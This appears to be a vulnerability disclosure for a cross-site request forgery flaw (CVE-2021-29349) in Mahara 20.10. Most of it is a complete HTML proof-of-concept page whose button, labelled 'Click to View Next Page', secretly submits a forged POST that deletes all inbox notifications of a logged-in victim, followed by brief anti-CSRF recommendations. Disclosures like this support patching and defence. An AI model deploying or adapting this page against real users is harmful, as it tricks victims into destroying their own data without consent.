Description: Cross Site Request Forgery (CSRF) that allows a remote attacker to delete inbox messages on the server. The application fails to validate the CSRF token for a POST request. An attacker can craft a forged POST request to the /inbox.php endpoint which, when submitted from a logged-in victim's browser, removes all messages from that user's mailbox.
/* Email Box Exploit - CSRF */
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body, html {
height: 100%;
margin: 0;
}
.bg {
/* The image used */
background-image: url("https://avatars.githubusercontent.com/u/78818477?s=400&u=b18f9de63b3df28e6e1b4d2dc64303048aa5f5b5&v=4");
/* Full height */
height: 100%;
/* Center and scale the image nicely */
background-position: center;
background-repeat: no-repeat;
background-size: cover;
}
</style>
</head>
<body>
<div class="bg"></div>
<p>CSRF CVE-2021-29349. After clicking the button below, all inbox mail messages will be deleted!!</p>
<!-- The hidden fields mirror the legitimate "Delete all notifications" form; type="hidden" was written as "type hidden" in the original -->
<form enctype="multipart/form-data" method="POST" action="https://demo.mahara.org/module/multirecipientnotification/inbox.php">
<input type="hidden" value="Delete+all+notifications" name="submit">
<input type="hidden" value="all" name="type">
<input type="hidden" value="L8T0C4WDuMxzakwV" name="sesskey">
<input type="hidden" value="" name="pieform_delete_all_notifications">
<input type="submit" value="Click to View Next Page">
</form>
</body>
</html>
Recommendations :
1- Implement an anti-CSRF token (X-CSRF-TOKEN) bound to the user's session, and make sure it is validated on the back-end server for every state-changing request, rather than only being present in the form.
2- Implement an interceptor that appends the token value to every state-changing request in a custom request header, X-XSRF-TOKEN-B.
Product : Mahara 20.10
Video POC : Google Drive Video